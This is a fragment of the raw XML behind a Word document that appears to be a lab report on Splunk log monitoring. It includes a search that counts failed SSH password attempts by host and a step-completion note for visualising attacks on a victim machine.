        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18CEDFD1" wp14:editId="2B9195E7">
            <wp:extent cx="5731510" cy="2770505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10503791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9653" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>index=* "Failed password" | stats count by host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CAC6A" w14:textId="336FA625" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536D26D2" wp14:editId="0186CDCB">
            <wp:extent cx="5731510" cy="2814320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179060666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5C89" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve">Visualize the attacks and compare the data from the victim. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0FE"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DE1B1" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184808B0" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase-2 Done  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0FE"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC68E48" w14:textId="77777777" w:rsidR="00630ACE" w:rsidRDefault="00630ACE"/>
    <w:sectPr w:rsidR="00630ACE" w:rsidSect="0078583B">
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="706" w:footer="706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F36AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09AC4A38"/>
    <w:lvl w:ilvl="0" w:tplc="CDE41E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54B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7D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89277">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="118575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E2"/>
    <w:rsid w:val="00062EA5"/>
    <w:rsid w:val="002B3CDE"/>
    <w:rsid w:val="002C5B16"/>
    <w:rsid w:val="004529B6"/>
    <w:rsid w:val="00597530"/>
    <w:rsid w:val="00630ACE"/>
    <w:rsid w:val="00655B70"/>
    <w:rsid w:val="006F60CA"/>
    <w:rsid w:val="0078583B"/>
    <w:rsid w:val="008713EF"/>
    <w:rsid w:val="00900BE6"/>
    <w:rsid w:val="009360AF"/>
    <w:rsid w:val="0094223F"/>
    <w:rsid w:val="00952A41"/>
    <w:rsid w:val="00A87F7B"/>
    <w:rsid w:val="00AA49EA"/>
    <w:rsid w:val="00BB3C82"/>
    <w:rsid w:val="00CD0C98"/>
    <w:rsid w:val="00E249E2"/>
    <w:rsid w:val="00E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0A5E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5E65AD46-2A7F-49D7-8A02-A8952A83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wnload.splunk.com/products/splunk/releases/9.3.2/linux/splunk-9.3.2-d8bb32809498-linux-2.6-amd64.deb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244</Words>
  <Characters>1539</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>102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HASHIM ALHARBI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>AHMED HASHIM ALHARBI</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-03T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-03T19:39:00Z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f49770be-238f-403a-84fe-d48e7b22e9dc</vt:lpwstr>
  </property>
</Properties>
</file>